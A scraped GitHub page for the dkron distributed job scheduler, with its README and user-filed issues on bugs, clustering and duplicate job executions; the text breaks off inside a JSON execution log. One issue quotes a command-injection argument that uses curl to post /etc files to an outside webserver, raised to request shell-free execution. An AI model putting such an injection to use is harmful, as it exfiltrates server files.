Giter Site home page Giter Site logo

distribworks / dkron Goto Github PK

View Code? Open in Web Editor NEW
4.2K 95.0 374.0 120.22 MB

Dkron - Distributed, fault tolerant job scheduling system https://dkron.io

License: GNU Lesser General Public License v3.0

Makefile 0.58% Go 69.13% Shell 0.67% HTML 2.00% JavaScript 15.46% CSS 0.86% Dockerfile 0.05% SCSS 2.41% TypeScript 8.42% Jinja 0.41%
scheduled-jobs fault-tolerance cron distributed-systems

dkron's Introduction

Dkron

Dkron - Distributed, fault tolerant job scheduling system for cloud native environments GoDoc Actions Status Gitter

Website: http://dkron.io/

Dkron is a distributed cron service, easy to setup and fault tolerant with focus in:

  • Easy: Easy to use with a great UI
  • Reliable: Completely fault tolerant
  • Highly scalable: Able to handle high volumes of scheduled jobs and thousands of nodes

Dkron is written in Go and leverage the power of the Raft protocol and Serf for providing fault tolerance, reliability and scalability while keeping simple and easily installable.

Dkron is inspired by the google whitepaper Reliable Cron across the Planet and by Airbnb Chronos borrowing the same features from it.

Dkron runs on Linux, OSX and Windows. It can be used to run scheduled commands on a server cluster using any combination of servers for each job. It has no single points of failure due to the use of the Gossip protocol and fault tolerant distributed databases.

You can use Dkron to run the most important part of your company, scheduled jobs.

Installation

Installation instructions

Full, comprehensive documentation is viewable on the Dkron website

Development Quick start

The best way to test and develop dkron is using docker, you will need Docker installed before proceeding.

Clone the repository.

Next, run the included Docker Compose config:

docker-compose up

This will start Dkron instances. To add more Dkron instances to the clusters:

docker-compose up --scale dkron-server=4
docker-compose up --scale dkron-agent=10

Check the port mapping using docker-compose ps and use the browser to navigate to the Dkron dashboard using one of the ports mapped by compose.

To add jobs to the system read the API docs.

Frontend development

Dkron dashboard is built using React Admin as a single page application.

To start developing the dashboard enter the ui directory and run npm install to get the frontend dependencies and then start the local server with npm start it should start a new local web server and open a new browser window serving de web ui.

Make your changes to the code, then run make ui to generate assets files. This is a method of embedding resources in Go applications.

Resources

Chef cookbook https://supermarket.chef.io/cookbooks/dkron

Python Client Library https://github.com/oldmantaiter/pydkron

Ruby client https://github.com/jobandtalent/dkron-rb

PHP client https://github.com/gromo/dkron-php-adapter

Terraform provider https://github.com/bozerkins/terraform-provider-dkron

Manage and run jobs in Dkron from your django project https://github.com/surface-security/django-dkron

Contributors

Made with contrib.rocks.

Get in touch

dkron's People

Contributors

a69 avatar andreygolev avatar clarifysky avatar daffodilistic avatar dependabot-preview[bot] avatar dependabot[bot] avatar digitalcrab avatar espina2 avatar fedebev avatar fopina avatar kevinwu0904 avatar kevynhale avatar mgsousa avatar mlafeldt avatar naxhh avatar piter77 avatar prakashdivyy avatar ramezhanna avatar richard-julien avatar rohitpaulk avatar sandyydk avatar sysadmind avatar tengattack avatar thierry-f-78 avatar ti avatar vcastellm avatar whizz avatar xavib avatar yvanoers avatar zaidqureshi2 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

dkron's Issues

Config file not being loaded

Downloaded the latest release for osx, running ./dkron agent inside unzipped folder doesn't seem to read in config file.

Allow jobs to run without a shell

Currently, dkron runs all jobs in a shell. This is fine in a trusted environment, however, when allowing users to define the commands that are executed, this becomes dangerous.

Our use case is the following: We're allowing our users to provide arguments for cron jobs that all run our own CLI tool. Right now, users could provide arguments like "$(curl -XPOST -d@/etc/... http://their-own-webserver.com)" which dkron would pass to /bin/sh which in turn would execute the curl command.

In order to prevent such exploits, we would like to be able to configure whether a jobs command should be run in a shell or not.

What do you think about this functionality?

cc @mlafeldt @Luzifer

Cluster missing executions

As an administrator of a dkron cluster I want my users to have a reliable cron system which guarantees "at least once" execution of their cron tasks.

My setup:

3 AWS EC2s running CoreOS stable, all three machines being part of an etcd cluster, all three machines running dkron 0.6.3 as a cluster. All machines does have role: executor tag and the following cron:

{
    "name": "date",
    "schedule": "0 */5 * * * *",
    "command": "/usr/bin/date",
    "owner": "Knut Ahlers",
    "owner_email": "knut****.com",
    "run_as_user": "core",
    "success_count": 58,
    "error_count": 0,
    "last_success": "2016-02-05T10:45:00.00621402Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": {
        "role": "executor:1"
    }
}

Expected result:

The cron is executed every 5 minutes and will succeed every single time as it just calls /usr/bin/date (which is the location of the date utility on CoreOS).

Observed result:

The task is sent to one of the machines every 5 minutes and gets eventually executed. The cron is missing several executions having no end date, no running date utility on the machine and a failed state.

screen shot 2016-02-05 at 11 43 02

Question

Can you help me with this / tell me what I'm doing wrong? Is there anything I can do to prevent this?

Leader election issues when upgrading from 0.6.3 to 0.7.0

Apparently, the leader election process has changed and the backend storage format has too. When upgrading existing cluster, the cluster will not recover from this by itself. The leader key must be deleted manually from backend storage (in my case consul). After that, the leader election happens and all is well. Maybe the cluster could recognize, that the leader data is in old format and delete it by itself?

Panic when running job

Hi,

we're currently experiencing a panic when manually running a job:

2016/04/26 16:11:13 http: panic serving 10.8.1.217:62544: runtime error: invalid memory address or nil pointer dereference
goroutine 622306 [running]:
net/http.(*conn).serve.func1(0xc8205866e0, 0x7f90b738adc0, 0xc820022168)
/Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1287 +0xb5
github.com/victorcoder/dkron/vendor/github.com/hashicorp/serf/serf.(*QueryResponse).Close(0x0)
/Users/victorcoder/src/github.com/victorcoder/dkron/vendor/github.com/hashicorp/serf/serf/query.go:117 +0xe7
github.com/victorcoder/dkron/dkron.(*AgentCommand).RunQuery(0xc820122120, 0xc820206f00)
/Users/victorcoder/src/github.com/victorcoder/dkron/dkron/agent.go:723 +0xe49
github.com/victorcoder/dkron/dkron.(*AgentCommand).jobRunHandler(0xc820122120, 0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/victorcoder/dkron/dkron/api.go:213 +0x2e7
github.com/victorcoder/dkron/dkron.(*AgentCommand).(github.com/victorcoder/dkron/dkron.jobRunHandler)-fm(0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/victorcoder/dkron/dkron/api.go:63 +0x3e
net/http.HandlerFunc.ServeHTTP(0xc82020b600, 0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1422 +0x3a
github.com/victorcoder/dkron/vendor/github.com/gorilla/mux.(*Router).ServeHTTP(0xc82000cd70, 0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/victorcoder/dkron/vendor/github.com/gorilla/mux/mux.go:98 +0x29e
github.com/victorcoder/dkron/vendor/github.com/carbocation/interpose.(*Middleware).UseHandler.func1.1(0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/victorcoder/dkron/vendor/github.com/carbocation/interpose/interpose.go:55 +0x69
net/http.HandlerFunc.ServeHTTP(0xc8200f2150, 0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1422 +0x3a
github.com/victorcoder/dkron/dkron.metaMiddleware.func1.1(0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/victorcoder/dkron/dkron/api.go:78 +0x1ac
net/http.HandlerFunc.ServeHTTP(0xc8200f2180, 0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1422 +0x3a
github.com/victorcoder/dkron/vendor/github.com/carbocation/interpose.(*Middleware).ServeHTTP(0xc820210fa0, 0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/victorcoder/dkron/vendor/github.com/carbocation/interpose/interpose.go:85 +0x6c
net/http.serverHandler.ServeHTTP(0xc820015e60, 0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1862 +0x19e
net/http.(*conn).serve(0xc8205866e0)
/Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1361 +0xbee
created by net/http.(*Server).Serve
/Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1910 +0x3f6

I've tracked the error down to these lines of code: (link)

    qr, err := a.serf.Query(QueryRunJob, exJson, params)
    if err != nil {
        log.WithFields(logrus.Fields{
            "query": QueryRunJob,
            "error": err,
        }).Debug("agent: Sending query error")
    }
    defer qr.Close()

From my perspective, the error is not being handled properly. The qr.Close is then called on nil which breaks somewhere in serf.

Consul - How to specify an ACL token?

(there was previously a bunch of text here; I'm throwing it out since I know the issue.)

How does one go about specifying an ACL token to use for Consul? My whole set up is locked down via tokens, but it seems like in the current from, to get dkron to work with Consul, I'd have to add a write permission to the anonymous token. Is there a way around that?

Specifying executing node count does not work

I am creating a simple example job, that I want to run only on one server in the cluster every five seconds:

Job definition:

{
    "name": "uptimesingle",
    "schedule": "*/5 * * * * *",
    "command": "uptime",
    "tags": {
        "role": "nrh_dkron_server:1"
    }
}

Three servers have the corresponding role tag. The first execution happens on only one server, but all subsequent executions happen on all the servers:

[{
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:35.003082159+01:00",
    "finished_at": "2015-12-17T10:47:35.021981973+01:00",
    "success": true,
    "output": "IDEwOjQ3OjM1IHVwIDQ2OCBkYXlzLCA0MiBtaW4sICA1IHVzZXJzLCAgbG9hZCBhdmVyYWdlOiAwLjg3LCAwLjc4LCAwLjczCg==",
    "node_name": "cz-dc-v-213.mall.local",
    "group": 1450345655000284700,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:40.001009965+01:00",
    "finished_at": "2015-12-17T10:47:40.005702977+01:00",
    "success": true,
    "output": "IDEwOjQ3OjQwIHVwIDQ2OCBkYXlzLCA0MiBtaW4sICA1IHVzZXJzLCAgbG9hZCBhdmVyYWdlOiAwLjg4LCAwLjc4LCAwLjczCg==",
    "node_name": "cz-dc-v-213.mall.local",
    "group": 1450345660000339700,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:40.064416976+01:00",
    "finished_at": "2015-12-17T10:47:40.067118607+01:00",
    "success": true,
    "output": "IDEwOjQ3OjQwIHVwIDEzMyBkYXlzLCAyMToyNiwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDAsIDAuMDAsIDAuMDAK",
    "node_name": "cz-dc-v-214.mall.local",
    "group": 1450345660000339700,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:40.06495417+01:00",
    "finished_at": "2015-12-17T10:47:40.069631854+01:00",
    "success": true,
    "output": "IDEwOjQ3OjQwIHVwIDM3OCBkYXlzLCAxOTo1MSwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDMsIDAuMDMsIDAuMDAK",
    "node_name": "cz-dc-v-211.mall.local",
    "group": 1450345660000339700,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:45.000775552+01:00",
    "finished_at": "2015-12-17T10:47:45.004132583+01:00",
    "success": true,
    "output": "IDEwOjQ3OjQ1IHVwIDQ2OCBkYXlzLCA0MiBtaW4sICA1IHVzZXJzLCAgbG9hZCBhdmVyYWdlOiAwLjg5LCAwLjc5LCAwLjczCg==",
    "node_name": "cz-dc-v-213.mall.local",
    "group": 1450345665000309200,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:45.064704859+01:00",
    "finished_at": "2015-12-17T10:47:45.067112311+01:00",
    "success": true,
    "output": "IDEwOjQ3OjQ1IHVwIDEzMyBkYXlzLCAyMToyNiwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDAsIDAuMDAsIDAuMDAK",
    "node_name": "cz-dc-v-214.mall.local",
    "group": 1450345665000309200,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:45.065110494+01:00",
    "finished_at": "2015-12-17T10:47:45.067889715+01:00",
    "success": true,
    "output": "IDEwOjQ3OjQ1IHVwIDM3OCBkYXlzLCAxOTo1MSwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDIsIDAuMDMsIDAuMDAK",
    "node_name": "cz-dc-v-211.mall.local",
    "group": 1450345665000309200,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:50.002168058+01:00",
    "finished_at": "2015-12-17T10:47:50.00769461+01:00",
    "success": true,
    "output": "IDEwOjQ3OjUwIHVwIDQ2OCBkYXlzLCA0MiBtaW4sICA1IHVzZXJzLCAgbG9hZCBhdmVyYWdlOiAwLjkwLCAwLjc5LCAwLjc0Cg==",
    "node_name": "cz-dc-v-213.mall.local",
    "group": 1450345670000230100,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:50.064456879+01:00",
    "finished_at": "2015-12-17T10:47:50.066860985+01:00",
    "success": true,
    "output": "IDEwOjQ3OjUwIHVwIDEzMyBkYXlzLCAyMToyNiwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDAsIDAuMDAsIDAuMDAK",
    "node_name": "cz-dc-v-214.mall.local",
    "group": 1450345670000230100,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:50.065033688+01:00",
    "finished_at": "2015-12-17T10:47:50.068118228+01:00",
    "success": true,
    "output": "IDEwOjQ3OjUwIHVwIDM3OCBkYXlzLCAxOTo1MSwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDIsIDAuMDMsIDAuMDAK",
    "node_name": "cz-dc-v-211.mall.local",
    "group": 1450345670000230100,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}]

Work together with kala?

Man, how I wish Kala and Dcron would just work together.

https://github.com/ajvb/kala

https://github.com/victorcoder/dcron

Fusing both would be AWESOME (I'd even like to help).

What Dcron gets right:

  • Distributed by design
  • Raft for the reliable parts, gossip for lightweight sync, a match made in heaven
  • Linux mentality
  • Dashboard included
  • Good docs, nice website, looks serious

What Kala gets right:

  • Built much more directly after Chronos, which has an amazing and battle tested API
  • Using ISO durations instead of NIHing their own format
  • Dependent jobs

A few questions regarding the inner working of dkron

I could not find the answer anywhere, so I hope this is the right place to ask:

  1. Does Dkron waits for a job to end to get the result and total run time? How does Dkron know if a job is "failed" or "succeed"?
  2. If any job runs longer than expected, does DKron starts the job again? For example if the previous batch is still running then does Dkron know it should wait?

Executing deleted and changed jobs

Dkron keeps executing deleted jobs for some reason. I have started two jobs with a simple curl command and then deleted both jobs, but they still keep executing. I'm not getting the jobs if I list all jobs in dkron. I get these logs in dkron:

INFO[2016-03-02T11:12:00+01:00] agent: Starting job                           job=job1
INFO[2016-03-02T11:09:00+01:00] agent: Starting job                           job=job2
WARN[2016-03-02T11:09:03+01:00] rpc: Received execution done for a deleted job.
WARN[2016-03-02T11:09:03+01:00] rpc: Error calling ExecutionDone              error=rpc: Received execution done for a deleted job.
WARN[2016-03-02T11:09:03+01:00] rpc: Received execution done for a deleted job.
WARN[2016-03-02T11:09:03+01:00] rpc: Error calling ExecutionDone              error=rpc: Received execution done for a deleted job.

If I query the consul key value at /v1/kv/dcron/jobs/?recurse= it's also empty.

If I restart dkron it stops executing the deleted jobs, but it seems to keep the schedule in memory after deletion.

After some digging I realised this seems to be an general issues when you make changes to a job, so for example if a disable a job it does not disable the in memory schedule and keeps going. Even worse if I make multiple changes to a job it creates new schedules for each change but does not stop the old one, so you will have multiple parallel executions for a single schedule. If I update a job that runs every second 5 times it then runs 5 times a second.

I'm using a local consul version 0.6.3 with a single node, and dkron version 0.6.4. Both are running locally on OSX 10.10.2.

Is this a known issue, or am I missing something in the documentation?

How to configure a cluster

I have done it like this:
In one console:
$ ./etcd

And in another console
$ ./dkron agent -server -debug=true -backend-machine=127.0.0.1:2379

That is all ok, I can create jobs and run jobs. But when I try to join anther agent to this server to build a cluster, I don't know where it is wrong. Here is what I do:

I do the following steps on anoter machine:

 $ ./dkron agent -backend-machine=10.16.28.17:2379 -debug=true                                              
 Starting Dkron agent...
 INFO[2015-12-18T19:27:09+08:00] agent: Dkron agent starting                  
 INFO[2015-12-18T19:27:09+08:00] agent: joining: [127.0.0.1:5001 127.0.0.1:5002] replay: true 
 WARN[2015-12-18T19:27:09+08:00] agent: error joining: dial tcp 127.0.0.1:5002: getsockopt: connection refused 
 INFO[2015-12-18T19:27:09+08:00] agent: Listen for events                     
 DEBU[2015-12-18T19:27:10+08:00] agent: Received event                         event=member-join

It don't work. I try to set the 'join' parameter as following:

$ ./dkron agent -backend-machine=10.16.28.17:2379 -debug=true -join="10.16.28.17:5001"
Starting Dkron agent...
INFO[2015-12-18T19:29:33+08:00] agent: Dkron agent starting                  
INFO[2015-12-18T19:29:33+08:00] agent: joining: [127.0.0.1:5001 127.0.0.1:5002] replay: true 
WARN[2015-12-18T19:29:33+08:00] agent: error joining: dial tcp 127.0.0.1:5002: getsockopt: connection refused 
INFO[2015-12-18T19:29:33+08:00] agent: Listen for events                     
DEBU[2015-12-18T19:29:34+08:00] agent: Received event                         event=member-join

It don't work either.

Thanks a lot.

One-off jobs

Feature idea: I have a use case, where I need to execute something sometime later, but just once and then the job should be deleted or archived. I would specify a date and time, when I want the job to run, with optional time window and dkron would make sure, the job will be run on the specified servers or just one of them within the given window. If the job succeeds, it would be deleted. If not, it will be retried n times in the given window, with exponential backoff, maybe. If at the end of the window it still did not run successfully, it would be deleted also, possibly triggering an alert.

delete localhost/8081/jobs/corn_job error

I see that file "api.go"
Method: jobDeleteHandler -> a.etcd.Client.Delete(job,false) no a.etcd.keyspace , so can't delete

i modify this method like this:
a.etcd.Client.Delete(a.etcd.keyspace+"/jobs/"+job,false)

then delete return ok

but my process "dkron2" terminated.

the console show "Key not found /dcron/jobs/corn_job" and "Terminating dkron2

DKron Zookeeper Failover not working

When we use multiple backend-machine to provide multiple instances of Zookeeper nodes to startup DKron and then if the ZK node to which the dkron server is connected to dies, the DKron server also dies and does not failover to the other ZK nodes

Add Serf's -advertise option to Dkron's options

This is a result of #108. The -advertise option seems crucial in running Serf in containers across different hosts. Without it, the container will advertise the containers IP and not the host causing the node to fail.

#55 not fixed yet

Issue #55 was closed, but is not fixed yet, I think.

Unfortunately, it's still not working. I tried 0.6.1 and the behavior is the same.

Job definition:

{
    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": 16,
    "error_count": 0,
    "last_success": "2015-12-21T10:05:00.083201311+01:00",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": {
        "role": "nrh_dkron_server:1"
    }
}

Executions:

[

{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:03:50.084912411+01:00",
    "finished_at": "2015-12-21T10:03:50.099487464+01:00",
    "success": true,
    "output": "IDEwOjAzOjUwIHVwIDM4MiBkYXlzLCAxOTowNywgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMjQsIDAuMjEsIDAuMTEK",
    "node_name": "cz-dc-v-211.mall.local",
    "group": ​1450688630000273965,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": ​0,
    "error_count": ​0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

        {
            "role": "nrh_dkron_server"
        }
    }

},
{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:00.000599135+01:00",
    "finished_at": "2015-12-21T10:04:00.003453523+01:00",
    "success": true,
    "output": "IDEwOjA0OjAwIHVwIDQ3MSBkYXlzLCAyMzo1OSwgIDUgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuOTYsIDAuOTAsIDAuNzYK",
    "node_name": "cz-dc-v-213.mall.local",
    "group": ​1450688640000194942,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": ​0,
    "error_count": ​0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

        {
            "role": "nrh_dkron_server"
        }
    }

},
{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:00.080118972+01:00",
    "finished_at": "2015-12-21T10:04:00.083194838+01:00",
    "success": true,
    "output": "IDEwOjA0OjAwIHVwIDEzNyBkYXlzLCAyMDo0MiwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDAsIDAuMDEsIDAuMDAK",
    "node_name": "cz-dc-v-214.mall.local",
    "group": ​1450688640000194942,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": ​0,
    "error_count": ​0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

        {
            "role": "nrh_dkron_server"
        }
    }

},
{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:00.080418988+01:00",
    "finished_at": "2015-12-21T10:04:00.08390867+01:00",
    "success": true,
    "output": "IDEwOjA0OjAwIHVwIDM4MiBkYXlzLCAxOTowOCwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMjAsIDAuMjAsIDAuMTEK",
    "node_name": "cz-dc-v-211.mall.local",
    "group": ​1450688640000194942,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": ​0,
    "error_count": ​0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

        {
            "role": "nrh_dkron_server"
        }
    }

},
{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:10.000856912+01:00",
    "finished_at": "2015-12-21T10:04:10.004640213+01:00",
    "success": true,
    "output": "IDEwOjA0OjEwIHVwIDQ3MSBkYXlzLCAyMzo1OSwgIDUgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDEuMDQsIDAuOTIsIDAuNzcK",
    "node_name": "cz-dc-v-213.mall.local",
    "group": ​1450688650000365412,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": ​0,
    "error_count": ​0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

        {
            "role": "nrh_dkron_server"
        }
    }

},
{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:10.079925794+01:00",
    "finished_at": "2015-12-21T10:04:10.083452121+01:00",
    "success": true,
    "output": "IDEwOjA0OjEwIHVwIDEzNyBkYXlzLCAyMDo0MywgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDAsIDAuMDEsIDAuMDAK",
    "node_name": "cz-dc-v-214.mall.local",
    "group": ​1450688650000365412,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": ​0,
    "error_count": ​0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

        {
            "role": "nrh_dkron_server"
        }
    }

},
{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:10.080275783+01:00",
    "finished_at": "2015-12-21T10:04:10.083116711+01:00",
    "success": true,
    "output": "IDEwOjA0OjEwIHVwIDM4MiBkYXlzLCAxOTowOCwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMTcsIDAuMTksIDAuMTEK",
    "node_name": "cz-dc-v-211.mall.local",
    "group": ​1450688650000365412,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": ​0,
    "error_count": ​0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

        {
            "role": "nrh_dkron_server"
        }
    }

},
{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:20.000726205+01:00",
    "finished_at": "2015-12-21T10:04:20.003752703+01:00",
